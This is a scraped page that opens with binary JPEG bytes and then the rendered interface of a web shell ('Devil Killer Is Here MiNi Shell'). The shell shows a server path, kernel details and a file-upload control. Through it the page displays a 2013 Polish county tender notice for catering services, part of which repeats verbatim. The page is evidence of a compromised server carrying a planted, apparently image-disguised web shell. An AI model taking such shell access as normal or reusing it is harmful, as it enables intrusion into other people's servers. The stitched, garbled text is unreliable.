JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130122/31188-N-2013.html

<p class="kh_header"><b>Choszczno: Świadczenie usług  cateringowych  na potrzeby realizacji projektu pn. Nie trać czasu-załóż własną firmę spełniaj się zawodowo ! III</b><br>
<b>Numer ogłoszenia: 31188 - 2013; data zamieszczenia: 22.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Choszcznie , ul. Nadbrzeżna 2, 73-200 Choszczno, woj. zachodniopomorskie, tel. 95 7657011, 12, 13, faks 95 7652093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spow.choszczno.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług  cateringowych  na potrzeby realizacji projektu pn. Nie trać czasu-załóż własną firmę spełniaj się zawodowo ! III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : Świadczenie usług cateringowych   na potrzeby realizacji projektu pn.Nie trać czasu-załóż własną firmę spełniaj się zawodowo ! III  w ramach Europejskiego Funduszu Społecznego Działanie 6.2 PO KL wsparcie oraz promocja przedsiębiorczości i samozatrudnienia, realizowanego przez Powiat Choszczeński  Starostwo Powiatowe w Choszcznie, dla uczestników szkolenia, członków Komisji Rekrutacyjnej, członków Komisji Oceny Wniosków o przyznanie wsparcia finansowego podstawowego , wsparcia pomostowego przedłużonego,  oraz uczestników konferencji spotkań promujących  zgodnie z umową UDA-POKL.06.02.00-32-018 12-00. 
Zamawiający podzielił zamówienie na 4 (cztery) części.
Część  Nr 1 Świadczenie usługi cateringowej dla uczestników projektu podczas  zajęć szkoleniowych  
                            Przedmiotem zamówienia jest świadczenie usług cateringowych (obiad i serwis kawowy) dla uczestników projektu podczas szkoleń organizowanych przez Zamawiającego w ramach projektu pn. Nie trać czasu-załóż własną firmę spełniaj się zawodowo  III!   w ramach Europejskiego Funduszu Społecznego Działanie 6.2 PO KL.
Zakres zamówienia dla części 1 obejmuje:
1.	Codzienne przygotowanie i dostarczanie posiłków w trakcie zajęć  dla uczestników projektu w ilości 11 spotkań dla 6 grup liczących  max po 10 osób w godzinach podanych przez Zamawiającego.
2.	Przedmiotem zamówienia jest 1 posiłek dziennie dla każdego uczestnika. Zajęcia prowadzone są 2 x w tygodniu dla każdej grupy.
3.	Posiłek powinien składać się z dania głównego (drugie danie). Danie główne powinno składać się z porcji mięsa (120 -150 g), ziemniaków (250 g), zestaw dwóch surówek (200 g).  Zamawiający dopuszcza zestaw obiadowy wg jadłospisu obowiązującego u Wykonawcy.
4.	Posiłki powinny być urozmaicone i nie powinny powtarzać się w przeciągu jednego tygodnia.
5.	Posiłek powinien być dostarczony do miejsca podanego przez Zamawiającego w porcjach dla jednej osoby, podawany na ciepło, w jednorazowych pojemnikach z kompletem sztućców jednorazowych. 
6.	Posiłki powinny być przygotowane zgodnie z polskimi normami żywieniowymi, z produktów o wysokim standardzie.
7.	Zamawiający ma prawo na bieżąco kontrolować realizację zamówienia.
8.	Wykonawca będzie realizował zamówienie w danym dniu na telefoniczne zamówienie zamawiającego na 3 godziny przed dostarczeniem posiłku. Informacja telefoniczna zawierać będzie informację o miejscu dostarczenia posiłku i liczbie posiłków.
9.	Serwis kawowy (na każdy dzień szkolenia w godzinach szkolenia podanych przez zamawiającego) : 
-gorąca kawa rozpuszczalna i herbata, podane w termosach  na 11 spotkań dla 6 grup liczących  max po 10 osób;
-dodatki: cukier, cytryna, mleko;
-mieszanka kruchych ciasteczek (co najmniej 3 rodzaje);
-woda mineralna gazowana, niegazowana, podana w butelkach plastikowych o pojemności 500 ml, po 1 szt. na osobę z każdego rodzaju;
- filiżanki jednorazowe (min.200 ml), łyżeczki, serwetki.

Część  Nr 2  Świadczenie usługi cateringowej dla  członków Komisji Oceny Wniosków
                            Przedmiotem zamówienia jest świadczenie usług cateringowych (obiad i serwis kawowy) na posiedzenia Komisji Oceny Wniosków  oceniającej wnioski w ramach projektu pn. Nie trać czasu-załóż własną firmę spełniaj się zawodowo ! III  w ramach Europejskiego Funduszu Społecznego Działanie 6.2 PO KL.
Zakres zamówienia dla części 2 obejmuje: 
1.Serwis kawowy (na dzień posiedzenia w godzinach podanych przez zamawiającego): 
-gorąca kawa rozpuszczalna i herbata, podane w termosach dla nie więcej niż 10 osób przez  8 dni;
-dodatki: cukier, cytryna, mleko;
-wyroby piekarnicze -min. po 200 g osobę;
-woda mineralna gazowana, niegazowana, podana w butelkach plastikowych o pojemności 500 ml, po 1 szt. na osobę z każdego rodzaju;
-tartinki (kanapeczki ozdobne, koktajlowe)
- filiżanki jednorazowe (min.200 ml), łyżeczki, serwetki.
2.liczba dni świadczenia usługi: 8 dni dla nie więcej niż 10 osób  posiłek dziennie dla każdego
uczestnika Komisji Oceny Wniosków.
3.  Posiłek powinien składać się z dania głównego (drugie danie). Danie główne powinno   składać się z porcji mięsa (120 - 150 g), ziemniaków  (250 g), sałatka warzywna -200 g-( z grillowanym kurczakiem lub serem feta).  Zamawiający dopuszcza zestaw obiadowy wg jadłospisu obowiązującego u Wykonawcy.
4. Posiłek powinien być dostarczony do miejsca podanego przez Zamawiającego w porcjach dla jednej osoby, podawany na ciepło, w jednorazowych pojemnikach z kompletem sztućców jednorazowych. 
5.Wykonawca będzie realizował zamówienie w danym dniu na telefoniczne zamówienie zamawiającego na 3 godziny przed dostarczeniem posiłku. Informacja telefoniczna zawierać będzie informację o  liczbie posiłków.
6. Liczba dni świadczenia usługi: 8 dni dla nie więcej niż 10 osób.


Część Nr 3  Świadczenie usługi cateringowej dla uczestników  konferencji i spotkań 
promujących projekt
Przedmiotem zamówienia jest świadczenie usług cateringowych ( serwis kawowy) dla uczestników konferencji i spotkań promujących projekt u pn. Nie trać czasu-załóż własną firmę spełniaj się zawodowo ! III  w ramach Europejskiego Funduszu Społecznego Działanie 6.2 PO KL
Zakres zamówienia dla części 3 obejmuje: 
1.Serwis kawowy (na dzień konferencji w godzinach podanych przez zamawiającego) :
-gorąca kawa rozpuszczalna i herbata, podane w termosach dla 30 osób.
-dodatki: cukier, cytryna, mleko;
- wyroby piekarnicze -min. po 200 g -osobę;
-woda mineralna gazowana, niegazowana, podana w butelkach plastikowych o pojemności 500 ml, po 1 szt. na osobę z każdego rodzaju;
- tartinki (kanapeczki ozdobne, koktajlowe);
- filiżanki jednorazowe (min.200 ml), łyżeczki, serwetki.
2.Planowana liczba uczestników 1 konferencji-  30osób. Zaplanowano 4 konferencje w okresie od dnia podpisania umowy do dnia 31.03.2015, średnio 1 x w roku. 

Część Nr 4  Świadczenie usługi cateringowej dla  członków Komisji Rekrutacyjnej 
                           Przedmiotem zamówienia jest świadczenie usług cateringowych (obiad i serwis kawowy) na posiedzenia Komisji Rekrutacyjnej  oceniającej wnioski w ramach projektu pn. Nie trać czasu-załóż własną firmę spełniaj się zawodowo ! III  w ramach Europejskiego Funduszu Społecznego Działanie 6.2 PO KL
Zakres zamówienia dla części 4 obejmuje: 
1.Serwis kawowy (na dzień posiedzenia w godzinach podanych przez zamawiającego): 
-gorąca kawa rozpuszczalna i herbata, podane w termosach dla nie więcej niż 5 osób przez 6 dni ;
  -dodatki: cukier, cytryna, mleko;
  -wyroby piekarnicze po 200g -osobę;
  -woda mineralna gazowana, niegazowana, podana w butelkach plastikowych o pojemności 500 ml,   po 1 szt. na osobę z każdego rodzaju;
-  tartinki (kanapeczki ozdobne, koktajlowe);
- filiżanki jednorazowe (200 ml), łyżeczki, serwetki.
2. Posiłek dziennie dla każdego  członka Komisji Oceny Wniosków.
 - posiłek powinien składać się z dania głównego (drugie danie). Danie główne   powinno składać   się z porcji mięsa (120 - 150 g), ziemniaków (250 g),  sałatka warzywna- 200g z grillowanym kurczakiem lub serem feta). Zamawiający  dopuszcza zestaw obiadowy wg jadłospisu obowiązującego u Wykonawcy.
  - posiłek powinien być dostarczony do miejsca podanego przez Zamawiającego w porcjach dla    
    jednej  osoby, podawany na ciepło, w jednorazowych pojemnikach z  kompletem sztućców   
    jednorazowych. 
 -  wykonawca będzie realizował zamówienie w danym dniu na telefoniczne zamówienie   
   zamawiającego na 3 godziny przed dostarczeniem posiłku. Informacja telefoniczna zawierać będzie    
   informację o  liczbie posiłków.
 3.Liczba dni świadczenia usługi: 6 dni dla nie więcej niż 5 osób.


3.2	Usługi dla wszystkich części będą realizowane w  budynku Starostwa Powiatowego  w Choszcznie ul. B. Chrobrego 27A
3.3	Przed podpisaniem umowy Wykonawcy poszczególnych części przedkładają dokumenty potwierdzające posiadane kwalifikacje i doświadczenie. 
3.4	Zamawiający żąda, aby Wykonawca wskazał w ofercie na daną część zakres zamówienia, którego wykonanie chce powierzyć podwykonawcom. Jeżeli Wykonawca ma zamiar zlecić wykonanie części zadania Podwykonawcy to musi wypełnić odpowiednie pola w ofercie cenowej stanowiącej załącznik nr 1 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3, 55.52.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania, w okolicznościach, o których mowa w art. 24 ust. 1 ustawy oraz spełniają warunki zawarte w art. 22 ust. 1 ustawy, a dotyczące:
a)	Nie są wykluczeni z postępowania na podstawie przesłanek z wykluczenia z postępowania, określonych w art. 24 ust. 1,2 Prawa Zamówień Publicznych 
b)	Spełniają warunki określone w Art. 22 ust 1 pkt 1-4 Prawa Zamówień Publicznych dotyczące:
-	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
-	posiadania wiedzy i doświadczenia 
-	dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
-	sytuacji ekonomicznej i finansowej
c)	Spełniają następujące warunki szczegółowe w zakresie wiedzy i doświadczenia 

O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej 1 usługę polegającą na wyżywieniu osób poza siedzibą Wykonawcy z  podaniem przedmiotu, dat wykonania, odbiorcy i wykonawcy usługi oraz załączeniem dokumentów potwierdzających, ze usługa została wykonana należycie np. referencjami . 
Zamawiający dokona oceny spełniania warunków przez Wykonawców na podstawie załącznika do oferty nr 2.Ocena spełniania warunków przez Wykonawców dokonana zostanie według reguły spełnia - nie spełnia.
W przypadku zaistnienia wątpliwości zamawiający zastrzega sobie prawo do żądania wyjaśnień potwierdzających spełnianie warunków.

VI.    WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ  WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU. 

6.1.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy do oferty należy załączyć:

Część  od 1 do 4 części:  

a)	Aktualny odpis z właściwego rejestru, (jeżeli odrębne przepisy wymagają wpisu do rejestru), w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania oferty, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy - zgodne z załącznikiem nr 2 do SIWZ.
W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną. 

b)	Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia - zgodnie z załącznikiem nr 3 do SIWZ. 
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu. 

6.2.	W celu wykazania spełnienia przez Wykonawcę warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy do oferty należy załączyć:
a)	Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - zgodnie z załącznikiem nr 2 do SIWZ. 
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik w imieniu Wykonawców składających ofertę wspólną.
Dotyczy części 1,2,3,4  zamówienia.

b)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, według wzoru, stanowiącego załącznik nr 4 do SIWZ. 
W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny wykaz osób którymi dysponują lub będą dysponować.
            Dotyczy części 1,2,3,4  zamówienia

c)	 Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wymienione w ww. wykazie osób), posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, według wzoru, stanowiącego załącznik nr 4  do SIWZ. 
Dotyczy części 1,2,3,4  zamówienia

6.3.   Dokumenty innych podmiotów:
Stosownie do zapisów art. 26 ust. 2b i 2c ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

6.4. 	W przypadku podmiotów, o których mowa w pkt 6.3. przekładane przez Wykonawcę kopie dokumentów dotyczących każdego z tych podmiotów muszą być poświadczone za zgodność z oryginałem przez te podmioty.    

6.5.	Ponadto Wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	  ofertę cenową zgodnie z rozdziałem XV, pkt 15.14.ppkt 1) SIWZ. Wzór oferty cenowej stanowi załącznik nr 1 do SIWZ
W przypadku składania oferty wspólnej należy złożyć jeden dokument;
2)	odpowiednie pełnomocnictwa;
	w przypadku składania oferty wspólnej (Rozdział VII, pkt 7.1. SIWZ);

6.6.	Wykonawca  skład jacy ofertę na więcej niż jedną część zamówienia jest obowiązany złożyć komplet dokumentów i oświadczeń wymaganych przez SIWZ osobno dla każdej części zamówienia. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 
6.7.	W przypadku załączenia do oferty innych dokumentów niż wymagane przez Zamawiającego (np. materiałów reklamowych i informacyjnych) zaleca się, aby stanowiły one odrębną część, niezłączoną z ofertą w sposób trwały. Dokumenty takie nie będą podlegały ocenie przez Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy nie podlegają wykluczeniu z postępowania, w okolicznościach, o których mowa w art. 24 ust. 1 ustawy oraz spełniają warunki zawarte w art. 22 ust. 1 ustawy, a dotyczące:
a)	Nie są wykluczeni z postępowania na podstawie przesłanek z wykluczenia z postępowania, określonych w art. 24 ust. 1,2 Prawa Zamówień Publicznych 
b)	Spełniają warunki określone w Art. 22 ust 1 pkt 1-4 Prawa Zamówień Publicznych dotyczące:
-	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
-	posiadania wiedzy i doświadczenia 
-	dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
-	sytuacji ekonomicznej i finansowej
c)	Spełniają następujące warunki szczegółowe w zakresie wiedzy i doświadczenia 

O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej 1 usługę polegającą na wyżywieniu osób poza siedzibą Wykonawcy z  podaniem przedmiotu, dat wykonania, odbiorcy i wykonawcy usługi oraz załączeniem dokumentów potwierdzających, ze usługa została wykonana należycie np. referencjami . 
Zamawiający dokona oceny spełniania warunków przez Wykonawców na podstawie załącznika do oferty nr 2.Ocena spełniania warunków przez Wykonawców dokonana zostanie według reguły spełnia - nie spełnia.
W przypadku zaistnienia wątpliwości zamawiający zastrzega sobie prawo do żądania wyjaśnień potwierdzających spełnianie warunków.

VI.    WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTARCZYĆ  WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU. 

6.1.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy do oferty należy załączyć:

Część  od 1 do 4 części:  

a)	Aktualny odpis z właściwego rejestru, (jeżeli odrębne przepisy wymagają wpisu do rejestru), w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania oferty, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy - zgodne z załącznikiem nr 2 do SIWZ.
W przypadku składania oferty wspólnej ww. dokument składa każdy z Wykonawców składających ofertę wspólną. 

b)	Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia - zgodnie z załącznikiem nr 3 do SIWZ. 
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu. 

6.2.	W celu wykazania spełnienia przez Wykonawcę warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy do oferty należy załączyć:
a)	Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - zgodnie z załącznikiem nr 2 do SIWZ. 
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik w imieniu Wykonawców składających ofertę wspólną.
Dotyczy części 1,2,3,4  zamówienia.

b)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, według wzoru, stanowiącego załącznik nr 4 do SIWZ. 
W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny wykaz osób którymi dysponują lub będą dysponować.
            Dotyczy części 1,2,3,4  zamówienia

c)	 Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wymienione w ww. wykazie osób), posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, według wzoru, stanowiącego załącznik nr 4  do SIWZ. 
Dotyczy części 1,2,3,4  zamówienia

6.3.   Dokumenty innych podmiotów:
Stosownie do zapisów art. 26 ust. 2b i 2c ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

6.4. 	W przypadku podmiotów, o których mowa w pkt 6.3. przekładane przez Wykonawcę kopie dokumentów dotyczących każdego z tych podmiotów muszą być poświadczone za zgodność z oryginałem przez te podmioty.    

6.5.	Ponadto Wykonawcy mają dołączyć do oferty następujące dokumenty:
1)	  ofertę cenową zgodnie z rozdziałem XV, pkt 15.14.ppkt 1) SIWZ. Wzór oferty cenowej stanowi załącznik nr 1 do SIWZ
W przypadku składania oferty wspólnej należy złożyć jeden dokument;
2)	odpowiednie pełnomocnictwa;
	w przypadku składania oferty wspólnej (Rozdział VII, pkt 7.1. SIWZ);

6.6.	Wykonawca  skład jacy ofertę na więcej niż jedną część zamówienia jest obowiązany złożyć komplet dokumentów i oświadczeń wymaganych przez SIWZ osobno dla każdej części zamówienia. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 
